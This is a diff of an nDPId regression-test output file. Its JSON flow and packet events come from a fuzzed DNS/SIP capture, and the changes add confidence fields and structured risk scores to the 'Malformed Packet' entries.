-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -874,27 +876,27 @@
 00560{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1120470431656,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470431656,"pkt":"ADBUADRWAODtAW69CABFAABEa08AAIARTAbAqAECwKgBAQrgADUAMIb5neUAAAABAAAAAAAAATEBMAEwJXMANwdpbi1hZGRyqqqqqqqqqqqqqg=="}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1120470431657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470431657,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgFAgA1CuAAR2l1neWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFzcGEAAAwAAcAMAAwAAQAAJyVzAAlsb2NhbGhvc3QA"}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18688,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470439142,"pkt":"ADBUADRWAODtAW69SQBFAIBIa1EAAIARTADAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18688}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470440137,"pkt":"ADBUADRWAODtAW69CABFAABIa1LfAEwlcwDAqAECwKgBAQrhADUANAD+KOYBAAABAAAAQAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469572981,"flow_last_seen":1120470431658,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9738,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469572981,"flow_last_seen":1120470431658,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9738,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":600000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1120470442140,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1120470442140,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":28,"ts_msec":1120470442140,"pkt":"ADBUADRWAODtAW69CABFAAAwa1MAAIATS\/7AqAECwKgBAQrhADUANAD+KOYBAAABAAAAAEsABF9zaXAEX3VkcANzaXB3Y3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1120470444143,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470444143,"pkt":"ADBUADRWAODtAW69CABFAABIa1QAAIARS\/3IqAECwKgBAQrhADUANAD+KOYBIAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAEk="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470447197,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1120470447197,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470447197,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa1YAAIARSvfAqAECwKgB\/wCJi4kAOltphTIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ3hDQSlNAAAgAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1120470448149,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470448149,"pkt":"ADBUADRWAODtAW69CABFAABIa1gAAIARS\/nAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXZjaXR5AmRrAAAhlAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -903,28 +905,28 @@
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1120470456151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470456151,"pkt":"ADBUADRWAODtAW69CABFAABEa1kAAIARS\/zAqAECwKgBAwriADUAMED14+cAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZKxyBGFycGEAAAwAAQ=="}
